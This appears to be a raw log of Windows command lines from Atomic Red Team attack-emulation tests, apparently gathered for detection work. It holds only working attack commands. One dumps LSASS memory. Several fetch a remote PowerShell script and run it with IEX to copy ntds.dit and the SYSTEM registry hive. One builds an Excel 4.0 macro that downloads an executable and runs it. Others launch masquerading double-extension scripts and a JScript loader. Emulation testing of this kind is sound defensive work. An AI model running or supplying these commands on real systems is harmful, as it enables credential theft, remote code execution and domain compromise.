"powershell.exe" & {C:\Windows\Temp\xordump.exe -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41}
"powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 -UseBasicParsing) Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile C:\Windows\Temp\ntds.dit Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile C:\Windows\Temp\SYSTEM_HIVE}
"powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 -UseBasicParsing) Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile C:\Windows\Temp\ntds.dit Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile C:\Windows\Temp\SYSTEM_HIVE}
"C:\WINDOWS\System32\WScript.exe" "C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.png.vbs"
"C:\WINDOWS\System32\WScript.exe" "C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.xls.vbs"
"C:\WINDOWS\System32\WScript.exe" "C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.xlsx.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -File C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -File C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -File C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.rtf.ps1
"powershell.exe" & {copy-item -Path \""\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password\"" -Destination \""$Env:TEMP\Easter_egg.password\""}
"C:\WINDOWS\System32\WScript.exe" "C:\Users\thaim\AppData\Local\Temp\AtomicTest.vbs"
powershell.exe  iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt
"powershell.exe" & {$fname = \""$env:TEMP\atomic_redteam_x4m_exec.vbs\"" $fname1 = \""$env:TEMP\procexp.exe\"" if (Test-Path $fname) { Remove-Item $fname Remove-Item $fname1 } $xlApp = New-Object -COMObject \""Excel.Application\"" $xlApp.Visible = $True $xlApp.DisplayAlerts = $False $xlBook = $xlApp.Workbooks.Add() $sheet = $xlBook.Excel4MacroSheets.Add() if (\""$env:Username\"" -ne \""\"") { $sheet.Cells.Item(1,1) = \""$env:Username\"" } else { $sheet.Cells.Item(1,1) = \""=GET.WORKSPACE(26)\"" } $sheet.Cells.Item(2,1) = \""procexp.exe\"" $sheet.Cells.Item(3,1) = \""atomic_redteam_x4m_exec.vbs\"" $sheet.Cells.Item(4,1) = \""=IF(ISNUMBER(SEARCH(`\""64`\"",GET.WORKSPACE(1))), GOTO(A5),)\"" $sheet.Cells.Item(5,1) = \""=FOPEN(`\""C:\Users\`\""&A1&`\""\AppData\Local\Temp\`\""&A3&`\""`\"", 3)\"" $sheet.Cells.Item(6,1) = \""=FWRITELN(A5, `\""url = `\""`\""https://live.sysinternals.com/procexp.exe`\""`\""`\"")\"" $sheet.Cells.Item(7,1) = \""=FWRITELN(A5, `\""`\"")\"" $sheet.Cells.Item(8,1) = \""=FWRITELN(A5, `\""Set winHttp = CreateObject(`\""`\""WinHTTP.WinHTTPrequest.5.1`\""`\"")`\"")\"" $sheet.Cells.Item(9,1) = \""=FWRITELN(A5, `\""winHttp.Open `\""`\""GET`\""`\"", url, False`\"")\"" $sheet.Cells.Item(10,1) = \""=FWRITELN(A5, `\""winHttp.Send`\"")\"" $sheet.Cells.Item(11,1) = \""=FWRITELN(A5, `\""If winHttp.Status = 200 Then`\"")\"" $sheet.Cells.Item(12,1) = \""=FWRITELN(A5, `\""Set oStream = CreateObject(`\""`\""ADODB.Stream`\""`\"")`\"")\"" $sheet.Cells.Item(13,1) = \""=FWRITELN(A5, `\""oStream.Open`\"")\"" $sheet.Cells.Item(14,1) = \""=FWRITELN(A5, `\""oStream.Type = 1`\"")\"" $sheet.Cells.Item(15,1) = \""=FWRITELN(A5, `\""oStream.Write winHttp.responseBody`\"")\"" $sheet.Cells.Item(16,1) = \""=FWRITELN(A5, `\""oStream.SaveToFile `\""`\""C:\Users\`\""&A1&`\""\AppData\Local\Temp\`\""&A2&`\""`\""`\"", 2`\"")\"" $sheet.Cells.Item(17,1) = \""=FWRITELN(A5, `\""oStream.Close`\"")\"" $sheet.Cells.Item(18,1) = \""=FWRITELN(A5, `\""End If`\"")\"" $sheet.Cells.Item(19,1) = \""=FCLOSE(A5)\"" $sheet.Cells.Item(20,1) = \""=EXEC(`\""explorer.exe C:\Users\`\""&A1&`\""\AppData\Local\Temp\`\""&A3&`\""`\"")\"" $sheet.Cells.Item(21,1) = \""=WAIT(NOW()+`\""00:00:05`\"")\"" $sheet.Cells.Item(22,1) = \""=EXEC(`\""explorer.exe C:\Users\`\""&A1&`\""\AppData\Local\Temp\`\""&A2&`\""`\"")\"" $sheet.Cells.Item(23,1) = \""=HALT()\"" $sheet.Cells.Item(1,1).Name = \""runme\"" $xlApp.Run(\""runme\"") $xlApp.Quit() [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null [System.GC]::Collect() [System.GC]::WaitForPendingFinalizers() Remove-Variable xlBook Remove-Variable xlApp}
cscript  //E:Jscript C:\Users\thaim\AppData\Local\Temp\OSTapGet.js
